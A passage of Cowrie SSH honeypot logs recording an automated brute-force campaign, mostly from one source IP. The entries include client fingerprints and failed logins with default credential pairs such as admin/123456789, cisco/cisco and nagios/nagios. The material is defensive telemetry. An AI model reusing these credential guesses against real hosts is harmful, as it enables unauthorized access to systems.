.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:21.017681Z","src_ip":"212.227.235.229","session":"41cc1324d62a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:22.756155Z","src_ip":"212.227.235.229","session":"41cc1324d62a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:24.016765Z","src_ip":"212.227.235.229","session":"41cc1324d62a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42918,"dst_ip":"1.2.3.4","dst_port":22,"session":"6180e4dfc5f8","protocol":"ssh","message":"New connection: 212.227.235.229:42918 (1.2.3.4:22) [session: 6180e4dfc5f8]","sensor":"my-vps","timestamp":"2025-08-26T21:18:26.316671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:26.557308Z","src_ip":"212.227.235.229","session":"6180e4dfc5f8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:26.589403Z","src_ip":"212.227.235.229","session":"6180e4dfc5f8"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:28.056989Z","src_ip":"212.227.235.229","session":"6180e4dfc5f8"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:29.497751Z","src_ip":"212.227.235.229","session":"6180e4dfc5f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46826,"dst_ip":"1.2.3.4","dst_port":22,"session":"658659e02c56","protocol":"ssh","message":"New connection: 212.227.235.229:46826 (1.2.3.4:22) [session: 658659e02c56]","sensor":"my-vps","timestamp":"2025-08-26T21:18:51.546720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:51.556945Z","src_ip":"212.227.235.229","session":"658659e02c56"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:52.811120Z","src_ip":"212.227.235.229","session":"658659e02c56"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:53.759928Z","src_ip":"212.227.235.229","session":"658659e02c56"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:55.020645Z","src_ip":"212.227.235.229","session":"658659e02c56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38098,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3047756043d","protocol":"ssh","message":"New connection: 212.227.235.229:38098 (1.2.3.4:22) [session: e3047756043d]","sensor":"my-vps","timestamp":"2025-08-26T21:19:28.419586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:19:28.562716Z","src_ip":"212.227.235.229","session":"e3047756043d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:19:28.678297Z","src_ip":"212.227.235.229","session":"e3047756043d"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"tpuser","message":"login attempt [ftp/tpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:19:31.979085Z","src_ip":"212.227.235.229","session":"e3047756043d"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:19:33.975399Z","src_ip":"212.227.235.229","session":"e3047756043d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39096,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b2a1831c0c5","protocol":"ssh","message":"New connection: 212.227.235.229:39096 (1.2.3.4:22) [session: 0b2a1831c0c5]","sensor":"my-vps","timestamp":"2025-08-26T21:19:39.064284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:19:39.434986Z","src_ip":"212.227.235.229","session":"0b2a1831c0c5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:19:39.461537Z","src_ip":"212.227.235.229","session":"0b2a1831c0c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39100,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1b0a42745d6","protocol":"ssh","message":"New connection: 212.227.235.229:39100 (1.2.3.4:22) [session: b1b0a42745d6]","sensor":"my-vps","timestamp":"2025-08-26T21:19:43.622419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:19:43.657454Z","src_ip":"212.227.235.229","session":"b1b0a42745d6"}
{"eventid":"cowrie.login.failed","username":"install","password":"install","message":"login attempt [install/install] failed","sensor":"my-vps","timestamp":"2025-08-26T21:19:44.204395Z","src_ip":"212.227.235.229","session":"0b2a1831c0c5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:19:44.951755Z","src_ip":"212.227.235.229","session":"b1b0a42745d6"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:19:45.446274Z","src_ip":"212.227.235.229","session":"0b2a1831c0c5"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-26T21:19:46.762363Z","src_ip":"212.227.235.229","session":"b1b0a42745d6"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:19:48.024029Z","src_ip":"212.227.235.229","session":"b1b0a42745d6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53040,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca598f0f53c","protocol":"ssh","message":"New connection: 217.72.205.35:53040 (1.2.3.4:22) [session: 0ca598f0f53c]","sensor":"my-vps","timestamp":"2025-08-26T21:19:50.860953Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:19:50.862133Z","src_ip":"217.72.205.35","session":"0ca598f0f53c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38002,"dst_ip":"1.2.3.4","dst_port":22,"session":"9924206744b3","protocol":"ssh","message":"New connection: 212.227.235.229:38002 (1.2.3.4:22) [session: 9924206744b3]","sensor":"my-vps","timestamp":"2025-08-26T21:19:54.116881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:19:54.230812Z","src_ip":"212.227.235.229","session":"9924206744b3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-c